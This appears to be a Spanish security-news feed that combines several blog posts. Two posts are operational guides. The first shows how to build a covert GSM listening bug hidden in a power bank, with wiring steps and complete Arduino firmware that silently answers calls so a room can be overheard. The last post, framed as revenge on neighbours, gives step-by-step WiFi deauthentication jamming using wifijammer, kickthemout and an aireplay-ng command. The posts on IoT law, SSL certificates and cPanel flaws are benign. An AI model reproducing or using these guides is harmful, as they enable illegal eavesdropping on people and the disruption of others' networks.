Este proceso es verdaderamente simple y no requiere conocimientos de hacking o el uso de avanzados componentes de hardware, pues solo se necesitan algunas piezas de cualquier radio convencional.

Solo algunas empresas cuentan con permisos gubernamentales para fabricar estos dispositivos, y aunque en teoría deberían apegarse a los requerimientos de los gobiernos, el desarrollo de estos dispositivos es tan fácil que cualquiera puede adquirir y usar uno.

Hay diversos tipos de vigilancia:

Bugs de radio y GSM
Uso de mini grabadoras de voz
Cámaras de video ocultas
Uso de micrófonos láser

El método que usaremos en esta ocasión consiste en elaborar un bug GSM, un dispositivo de gran alcance y batería de larga duración. Sus características le permiten trabajar en modo de espera por hasta diez días y escuchar hasta 4 horas de llamadas telefónicas.

Pinchar conversaciones

La forma más fácil es esconder algo en el lugar más visible, en algo que no llame la atención. A continuación se presentan algunos interesantes para disfrazar su dispositivo de espionaje.

Estas opciones de escucha también son interesantes porque los objetos en los que se introdujeron los dispositivos de espionaje casi siempre están conectados a la red: de esta manera, el dispositivo de espionaje nunca dejara de funcionar, lo que significa que llevará más tiempo realizar su función: transmitir información.

Si el dispositivo de espionaje funciona solo con su propia batería, tendrá que pensar en en un método para recargarla sin que el dispositivo sea detectado; incluso en las películas de espías esto causa problemas adicionales. Una opción es introducir un bug en una batería externa para cargar un teléfono inteligente. A menudo se lleva consigo, se carga y, si no se carga, se convierte en una fuente de energía para el dispositivo de espionaje.

Montaje del dispositivo de escucha

Para montar el dispositivo necesitamos:

Módulo GSM Sim 800
Arduino Pro mini
Un set Power Bank para cuatro baterías Li-ion 18650
Dos o tres baterías 18650 (usé dos)
Un micrófono
Tarjeta SIM

Para ensamblar correctamente un dispositivo para escuchar, necesita conocer las asignaciones de pines en los mini módulos GSM Sim 800 y Arduino Pro.

A continuación, soldamos la antena al módulo GSM en el enchufe NET.

Para las salidas MIC+ y micrófono para soldar MIC
RXD y TXD en el módulo GSM a los pines sexto y séptimo en el Arduino
Soldamos Vccboth GNDfrom el módulo al Arduino y a los contactos en la batería externa

Después de soldar todos los componentes en sus lugares, debe asegurarse de que el soldado sea correcto: A continuación deberá flashear el controlador.

// Conectamos la biblioteca para la implementación de software del intercambio de protocolo UART
#include <SoftwareSerial.h>
SoftwareSerial SIM800 (7, 6); // RX, TX
 
// Establecer una variable para almacenar la respuesta del módulo
String _response = "";
configuración vacía () {
// La velocidad del intercambio de datos con la computadora
Serial.begin (19200);
// La velocidad del intercambio de datos con el módem
SIM800.begin (19200);
Serial.println ("¡Iniciar!");
 
// Enviar AT para establecer la velocidad en baudios
sendATCommand ("AT", verdadero);
 
// Comandos para configurar el módem en cada inicio
// Activar el identificador de llamadas
_response = sendATCommand ("AT + CLIP = 1", verdadero);
// Opción con DTMF
// _ respuesta = sendATCommand ("AT + DDET = 1", verdadero);
}
 
String sendATCommand (String cmd, bool en espera) {
// Establecer una variable para almacenar el resultado
String _resp = "";
// Duplica el comando en el monitor de puerto
Serial.println (cmd);
// Envía un comando al módulo
SIM800.println (cmd);
// Si necesita esperar una respuesta, espere a que se envíe la respuesta
if (esperando) {
_resp = waitResponse ();
// Si el modo de eco está desactivado (ATE0), estas tres líneas se pueden comentar
if (_resp.startsWith (cmd)) {
_resp = _resp.substring (_resp.indexOf ("\ r", cmd.length ()) + 2);
}
// Duplicar la respuesta al monitor de puerto
Serial.println (_resp);
}
// Devuelve el resultado. Vacío si hay problema
return _resp;
}
 
// Función de esperar una respuesta y devolver el resultado
String waitResponse () {
// Variable para almacenar el resultado
String _resp = "";
// Variable para rastrear el tiempo de espera (10 segundos)
_tiempo de espera largo = milis () + 10000;
// Espere 10 segundos por una respuesta y verifique la respuesta o el tiempo de espera
while (! SIM800.available () &amp;&amp; millis () <_timeout) {};
// Si hay algo para leer, lee y recuerda
si (SIM800.available ()) {
_resp = SIM800.readString ();
}
// Si ha llegado un tiempo de espera, lo notificamos y devolvemos el resultado
else {
Serial.println ("Tiempo de espera ...");
}
return _resp;
}
 
bucle vacío () {
// Si el módem envió algo, obtenemos una respuesta para su análisis
si (SIM800.available ()) {
_response = waitResponse ();
// Elimina espacios adicionales al principio y al final e imprime la respuesta en el monitor de puerto
_response.trim ();
Serial.println (_response);
// Lista blanca de teléfonos, puede especificar varios de ellos separados por comas
String whiteListPhones = "+380713337866";
// Si hay una llamada entrante, verifique si hay información sobre la definición del número. Si es así, entonces phoneindex> -1
if (_response.startsWith ("RING")) {
int phoneindex = _response.indexOf ("+ CLIP: \" ");
// Variable para almacenar un número específico
String innerPhone = "";
// Si se encontró información, analice la línea y obtenga el número
if (phoneindex> = 0) {
phoneindex + = 8;
innerPhone = _response.substring (phoneindex, _response.indexOf ("\" ", phoneindex));
// Imprime el número en el monitor de puerto
Serial.println ("Número:" + innerPhone);
}
// Compruebe que la longitud del número sea superior a seis dígitos y el número en la lista
// Si es así, respondemos la llamada, si no, rechazamos la llamada
if (innerPhone.length ()> = 7 &amp;&amp; whiteListPhones.indexOf (innerPhone)> = 0) {
sendATCommand ("ATA", verdadero);
}
else {
sendATCommand ("ATH", verdadero);
}
}
}
// Espere los comandos seriales y envíe el comando recibido al módem
if (Serial.available ()) {
SIM800.write (Serial.read ());
};
}

Con el sellado y el firmware adecuados, nuestro dispositivo solo responderá las llamadas entrantes de números móviles autorizados, que están registrados en el firmware. Ahora es el momento de quitar los cables de conexión largos, desoldar los LED de la placa Arduino. A continuación aislaremos el micrófono con termorretráctil, le perforamos un agujero en la carcasa de la batería externa y lo colocamos junto con dos tableros al pegamento termofusible, en lugar de una batería 18650.

En el ejemplo mostrado en el artículo, se usaron dos baterías, pero puede usar tres si lo desea; habrá suficiente espacio.

Hemos ensamblado un dispositivo de espionaje GSM en una caja de batería externa. Por supuesto, no es perfecto, pero hay varias formas de mejorarlo.

Tome un estuche con una mejor capacidad de batería
Para una mayor autonomía, ponga el módulo GSM en modo de suspensión y, cuando presione el botón de encendido de la batería, active sus funciones
Envíe un mensaje al propietario de las llamadas cuando presione un botón en una batería externa

Conclusiones

Hemos diseñado y ensamblado un dispositivo completamente capaz de escuchar conversaciones en un cuarto. El costo de este dispositivo casero es mucho menor que el de aquellos desarrollados por grandes compañías de inteligencia o disponibles en Internet. Si decide replicar este dispositivo tenga en cuenta que la privacidad de los usuarios es inviolable, por lo que no deberá hacer esto con fines maliciosos.

El cargo Cómo crear un dispositivo espía en un mouse para escuchar conversaciones en una oficina como la CIA apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

El gobierno aprueba la Ley de Ciberseguridad IoT para proteger los dispositivos de Internet de las Cosas

El Congreso de Estados Unidos acaba de aprobar un proyecto de ley sobre ciberseguridad con el que esperan que la industria en general mejore las medidas de seguridad incluidas en dispositivos de Internet de las Cosas (IoT).

La Ley de mejora de la Ciberseguridad IoT establece que el Instituto Nacional de Estándares y Tecnología (NIST) establezca los requisitos de seguridad a los que deberán apegarse todos los fabricantes de tecnología IoT que busquen trabajar con el gobierno federal, principalmente en áreas como la corrección de vulnerabilidades o la comprobación de identidad de usuarios.

El tema central es dotar a las agencias federales de los mecanismos de ciberseguridad ideales, además de impulsar a los fabricantes a adoptar los más altos estándares sin importar si colaboran con el gobierno estadounidense: “Esperamos generar un impacto considerable en el mercado en general, beneficiando a empresas y consumidores”, menciona el Senador Mark Warner, uno de los principales impulsores del proyecto.

Los esfuerzos por mejorar la seguridad IoT no iniciaron en el Congreso. Hace años los investigadores y organizaciones para la defensa de los consumidores comenzaron a señalar la necesidad de mejorar la seguridad en estos dispositivos, sin mencionar que el gobierno de E.U. invierte cada vez más en esta tecnología, por lo que se ha vuelto necesario reforzar su seguridad.

Los legisladores proponentes pasaron por un largo proceso antes de la aprobación del proyecto, que fue objeto de múltiples modificaciones. La primera versión, por ejemplo, era extremadamente detallada sobre las exenciones para aplicar los estándares a las compañías contratistas, apartado que no llegó al Senado.

Los cambios en la industria también han contribuido para la modificación del proyecto hasta llegar a su versión final: “En los casi cuatro años desde que se presentó este proyecto de ley, hemos visto avances considerables por parte de la industria en campos como el reconocimiento de los riesgos de seguridad IoT, ya sea como parte de enormes ataques DoS como los relacionados con la botnet Mirai, o en los esfuerzos de los actores de amenazas para comprometer esta infraestructura”, señala el Senador Warner.

Al respecto Suzanne Spaulding, directora del proyecto Defending Democratic Institutions en el Centro de Estudios Estratégicos e Internacionales, considera que este es un gran paso adelante en términos de ciberseguridad: “Puede que la versión final sea mejorable, pero es un gran punto de partida para conseguir logros importantes”, concluye.

El cargo El gobierno aprueba la Ley de Ciberseguridad IoT para proteger los dispositivos de Internet de las Cosas apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

3 vulnerabilidades críticas en CPanel permiten tomar el control de las bases de datos y esquivar 2FA en cuestión de minutos

Especialistas en ciberseguridad reportan el hallazgo de tres vulnerabilidades en CPanel, un panel de control para administrar servidores de hosting web que proveen herramientas de automatización y una interfaz gráfica basada en páginas web.

En la primera falla, muchas interfaces de cPanel y WHM crean URI para otras interfaces incorporando datos proporcionados por el usuario en los parámetros de consulta de URI. Varias interfaces de cPanel y WHM usaban codificación URL en estos parámetros en lugar de codificación URI. Debido a este error, un usuario de cPanel & WHM podría ser engañado para realizar acciones arbitrarias.

Por el momento esta vulnerabilidad no cuenta con clave de identificación CVE o puntaje según el Common Vulnerability Scoring System (CVSS).

La segunda vulnerabilidad reportada reside en el mecanismo de autenticación multifactor, que no cuenta con un método de prevención de ataques de fuerza bruta. Los actores de amenazas podrían obtener acceso al sistema objetivo con facilidad.

Esta es una vulnerabilidad de severidad baja que recibió un puntaje de 3.8/10 y su explotación permitiría a los hackers maliciosos acceder a los sistemas afectados de forma remota.

Finalmente, la tercera falla existe debido a la inapropiada desinfección de los datos proporcionados por el usuario en la interfaz WHM Transfer Tool. Los actores de amenazas remotos podrían engañar a las víctimas para que sigan enlaces especialmente diseñados y ejecutar código HTML y script arbitrario en el navegador del usuario objetivo.

La falla recibió un puntaje de 5.3/10 y su explotación permitiría el robo de información confidencial, la modificación de la interfaz de un sitio web, el despliegue de ataques de phishing, entre otros escenarios.

A pesar de que las fallas pueden ser explotadas de forma remota por actores de amenazas no autenticados, los expertos no han detectado intentos de explotación activa o la existencia de un malware vinculado al ataque.

Las actualizaciones ya están disponibles, por lo que se recomienda a los usuarios de instalaciones vulnerables actualizar a la brevedad.

El cargo 3 vulnerabilidades críticas en CPanel permiten tomar el control de las bases de datos y esquivar 2FA en cuestión de minutos apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

Certificado SSL y como obtenerlo para mi sitio web

Hoy en día, la seguridad en el mundo online, ocupa un lugar muy importante para los usuarios. Esto se debe a que cada vez es mayor la cantidad de personas que utilizan internet para realizar transacciones de dinero o compartir datos sensibles. Es por este motivo que, hackers y estafadores, se encuentran al acecho de encontrar sitios que no tengan la suficiente protección.

Este mundo en línea, que ya forma parte de la realidad de los seres humanos, tiene una gran cantidad de ventajas que atraen a los usuarios. Acortar distancias, obviar el espacio temporal y acelerar la velocidad de ciertos procesos, son factores que tienen muchos beneficios no sólo a nivel personal, sino también empresarial.

Sin embargo, a la par de todas estas ventajas, se encuentran los peligros que involucra esta red. Es un canal muy utilizado para cometer delitos informáticos. Además de fraudes, es posible ingresar a sistemas de forma ilegal, y obtener datos que deberían estar protegidos. Para evitar todos estos problemas en tu web, debes implementar el certificado SSL.

¿Qué es el certificado SSL?

El certificado SSL es un título virtual que da crédito de la identidad de un sitio web. A la vez, a través de la tecnología SSL, se realiza un cifrado de información que limita la visibilidad de esta salvo que tengas una clave específica. Este cifrado se trata de la mezcla de datos de una forma que sea imposible de entender. En el certificado SSL se encuentra: el nombre del titular, un número de serie con fecha de vencimiento, la firma del que autoriza y un duplicado de la clave del titular.

A través de esta tecnología, la conexión que se lleva a cabo entre el usuario y el sitio web, es segura. Las personas pueden notarlo dado que, al tener certificado SSL, el protocolo utilizado será HTTPS. El comienzo común, de un sitio con poca seguridad, es HTTP. En caso de que ingreses a un sitio sin certificación, el mismo navegador te avisará que la web “no es segura”.

¿Cómo obtener este certificado?

Para obtener el certificado SSL, hay dos opciones conocidas y utilizadas por la gran mayoría. La primera de ellas es recurrir a aquellas entidades que brindan servicios de seguridad digital y contratarlo de forma directa. En este caso, debes ingresar al sitio de alguna de estas empresas y completar la información requerida para poder instalarlo.

Otra forma, la más sencilla, es con la contratación de otro servicio. Por lo general, el proveedor que ofrece servicio de web hosting, también incluye dentro del plan (dependiendo de la selección) el certificado SSL. Esto es mucho más fácil dado que alguien más se encarga de la instalación.

Tres tipos de certificación

Existen diferentes tipos de certificados, dependiendo del alcance. Si el alcance es menor, el costo de dicha certificación va a ser mucho más bajo. Por el contrario, mientras mayor cantidad de servicios incluya el certificado, más alto será el valor.

Certificado de validación de la compañía

Al seleccionar este certificado, te aseguras de que se realiza la validación del dominio y se constata la existencia de la empresa. Para poder obtener este certificado, debes saber que se realizan algunas llamadas para detallar y comprobar la información proporcionada.

Certificado de validación extendido

Este certificado es, de los tres, el más abarcativo. Lo bueno que tiene es que te aseguras de que el sitio esté certificado, no sólo para ti, sino también para los usuarios. Este certificado por el que obtienes la “barra verde” que indica que el sitio es seguro para navegarlo. Lo malo es que el proceso para realizar la validación es largo e involucra una gran cantidad de trámites (virtuales y físicos).

Certificado compartido

El certificado compartido es el más básico que existe. A través de este certificado, obtienes algunas funciones básicas que no llegan a validar de forma completa ni el dominio ni la empresa. Lo bueno que tiene este certificado, es que suele tener un costo muy bajo (en ocasiones gratuitos), por lo que se vuelve ideal para aquellas personas que recién están empezando y no poseen tanta capacidad de inversión. Además, es mejor tener algo básico que no tener ninguna protección.

Algunos beneficios de tener certificación SSL

Influye en el posicionamiento SEO, dado que mejora la reputación de la web.
Brinda mayor confianza a los usuarios que visitan el sitio.
Además de cuidar los datos de los usuarios, evita problemas a los propietarios del website.
Algunos de ellos, incluyen evaluaciones de seguridad y protegen de malwares.
Demuestra que se trata de un sitio profesional, al que se le dedica tiempo.

Como puedes ver, proteger tu web contra ataques externos es muy importante. A la vez, obtener la certificación SSL es mucho más fácil de lo que parece. No te dejes estar en algo que no sólo te cuida a ti, sino también a tus clientes.

El cargo Certificado SSL y como obtenerlo para mi sitio web apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

Venga a tus vecinos bloqueando cualquier WiFi en una cuadra. 3 formas de crear un jammer WiFi sin hardware

Un jammer WiFi es un dispositivo o software que lleva a cabo un ataque de desautenticación WiFi. Es un tipo de ataque de denegación de servicio (DoS) establecido entre la comunicación de un dispositivo y una conexión WiFi o punto de acceso inalámbrico que impide la conexión a Internet.

En esta ocasión, los especialistas del Instituto Internacional de Seguridad Cibernética (IICS) le mostrarán cómo crear un jammer WiFi para impedir la conexión como en las películas o del mismo modo en que trabajan los equipos de seguridad de los presidentes, congresistas, gobernadores o cualquier otro político relevante.

Si bien pueden elaborarse bloqueadores WiFi físicos, este tutorial se basará en desarrollar una herramienta de software usando Kali Linux y mediante tres métodos diferentes. No es necesario comprar hardware o herramientas por el estilo, sólo requerirá de seguir este tutorial con el método de su elección.

Método 1 – Script wifijammer

Este es el método más fácil, aseguran los expertos de IICS. Usando este script podrá bloquear continuamente todos los clientes WiFi y puntos de acceso dentro del alcance, aunque la eficacia de este método está limitada por su tarjeta inalámbrica.

Las tarjetas Alfa parecen atascarse efectivamente dentro de un radio de bloque con una gran saturación del punto de acceso. La granularidad se da en las opciones para una focalización más efectiva.

Este método requiere: python 2.7, python-scapy, una tarjeta inalámbrica con soporte para inyección.

Python wifijammer

Esto encontrará la interfaz inalámbrica más potente y activará el modo de monitor. Si una interfaz de modo de monitor ya está activa, utilizará la primera que encuentre. Luego comenzará a saltar secuencialmente los canales 1 por segundo del canal 1 al 11 identificando todos los puntos de acceso y clientes conectados a esos puntos de acceso. En la primera pasada a través de todos los canales inalámbricos, solo identifica objetivos. Después de eso, se elimina el límite de tiempo de 1 segundo por canal y los canales se saltan tan pronto como los paquetes de autenticación terminan de enviarse. Tenga en cuenta que aún agregará clientes y AP a medida que los encuentre después del primer paso.

Para continuar con la instalación del WiFi jammer, siga los pasos a continuación:

Simplemente abra la terminal y escriba el comando:
git clone https://ift.tt/3l9JpqV

Esto descargará la carpeta wifijammer de GitHub a su sistema

Una vez que se descargue, puede verificarlo haciendo ls, esto le mostrará todos los archivos en su directorio actual

El siguiente paso sería navegar dentro de la carpeta wifijammer, lo que puede hacer ejecutando el comando cd wifijammer. Escriba ls para enumerar todos los archivos dentro de esta carpeta

Entonces, una vez que esté dentro de esta carpeta, ejecute el comando python wifijammer y listo

Este script escaneará todas las redes WiFi a su alrededor a través de diferentes canales. Una vez que se inicia el escaneo, esto también escaneará todos los dispositivos conectados a esas redes WiFi y los desconectará automáticamente
Esto evita que los usuarios del dispositivo accedan a la red WiFi, lo que provoca que la red inalámbrica se atasque

Para detener el proceso simplemente presione Ctrl+C

Tenga en cuenta que si está conectado a una red WiFi también perderá su conexión. Para recuperar la conexión, detenga el script y luego intente volver a conectarse. Si cierra la terminal y no detiene el script, no podrá volver a conectarse a una red inalámbrica. Esto es muy importante, no lo olvide

Método 2 – Script Kickthemout

Aquí hay otro script que es bastante popular entre los especialistas, menciona IICS. Este script es algo más avanzado que el script de wifijammer, así que echemos un vistazo antes de comenzar a trabajar.

Ejecute el siguiente comando
- sudo apt-get update && sudo apt-get install nmap
luego ejecute el comando
- sudo apt-get install python3-pip

A continuación abra una nueva terminal y descargue el script del repositorio de GitHub ejecutando el siguiente comando:
- git clone https://ift.tt/2i5XWsp
Una vez descargada, cambie la ubicación de su shell a la carpeta kickthemout
Ejecute el comando cd kickthemout
Ahora, cuando haga ls, verá que hay muchos archivos dentro de la carpeta. Pero el archivo que estamos buscando es kickthemout.py. Este es el archivo de secuencia de comandos que vamos a ejecutar para provocar que las redes WiFi que nos rodean se bloqueen

Hasta ahora no podemos ejecutar este script porque no tenemos permisos de ejecutables en este archivo. Para obtener permiso de ejecutables, ejecute el comando
- chmod +x kickthemout.py
Ahora el color del archivo de secuencia de comandos cambiará a verde, lo que indicará que el archivo se puede ejecutar. Además, tenga en cuenta que puede tener diferentes códigos de colores establecidos en el shell
Instale los requerimientos usando el siguiente comando
- sudo -H pip3 install -r requirements.txt
Después de eso podrá ejecutar con el siguiente comando
- python3 kickthemout.py

Método 3 – Aireplay

Para crear un bloqueador de señal WiFi usando Aireplay, primero debe cambiar el modo de monitorización de su tarjeta inalámbrica.

Primero, averigüe el nombre de su tarjeta WiFi. Para cambiar el modo de monitorización, deberá obtener el nombre de su tarjeta inalámbrica. Puede hacerlo usando el comando iwconfig, generalmente es wlan0, pero puede ser diferente en su caso
En el ejemplo siguiente, el nombre de la tarjeta es wlan0
Para verificar en qué modo se está ejecutando su tarjeta WiFi, ejecute el comando iwconfig wlan0

Puede ver que la tarjeta inalámbrica se llama wlan0 y se está ejecutando en modo administrado

Ejecute los siguientes comandos uno por uno
- ifconfig wlan0 down
Este comando apagará su tarjeta inalámbrica. Ejecutar este comando asegurará que no tenga ningún error al intentar cambiar la tarjeta WiFi al modo monitor
- iwconfig wlan0 mode monitor
La ejecución de este comando hará que su tarjeta inalámbrica pase al modo monitor
- ifconfig wlan0 up
Una vez que haya cambiado el modo a modo monitor, deberá encender la tarjeta WiFi

Eso es todo, ahora está en modo monitor y puede rastrear fácilmente paquetes de las redes inalámbricas que lo rodean. Para comprobar si el modo de monitorización se ha habilitado correctamente de nuevo, ejecute el comando iwconfig wlan0 y compruebe la parte del modo. Si tiene un monitor escrito enfrente, está listo para comenzar

Ejecute el comando airodump-ng wlan0 para ver todas las redes WiFi a su alrededor

Ahora, podrá ver todas las redes dentro de su alcance WiFi. Puede ver esta red solo porque ha activado la conexión WiFi en modo monitor
Ahora abra una nueva ventana de terminal y ejecute el siguiente comando:
- aireplay-ng -0 0 -a [bssid] [interfaz]
Aquí bssid significa la dirección mac de la red inalámbrica a la que desea bloquear las señales. El bssid a utilizar es
- C8: D7: 79: 51: 40: 0B
Y la interfaz es el nombre de la tarjeta inalámbrica, que en este caso es wlan0
Así es como se verá el comando después de ingresar todos los detalles necesarios

Una vez que ingrese, aireplay-ng enviará un número ilimitado de paquetes al punto de acceso deseado (enrutador). Esto hará que todos los dispositivos conectados a ese punto de acceso pierdan la conexión. Los expertos de IICS le recomiendan que no lo deje funcionando, a menos que quiera experimentar serios problemas. Puede detener el ataque simplemente haciendo clic en Ctrl+C

Tenga en cuenta que el uso de bloqueadores WiFi en áreas públicas está estrictamente prohibido. Estos métodos son realmente poderosos y ciertamente puede cerrar la conexión de red inalámbrica de todo su vecindario. También debe recordar que esta es una variante de ataque DoS, por lo que deberá utilizar los métodos mostrados con cuidado.

El cargo Venga a tus vecinos bloqueando cualquier WiFi en una cuadra. 3 formas de crear un jammer WiFi sin hardware apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente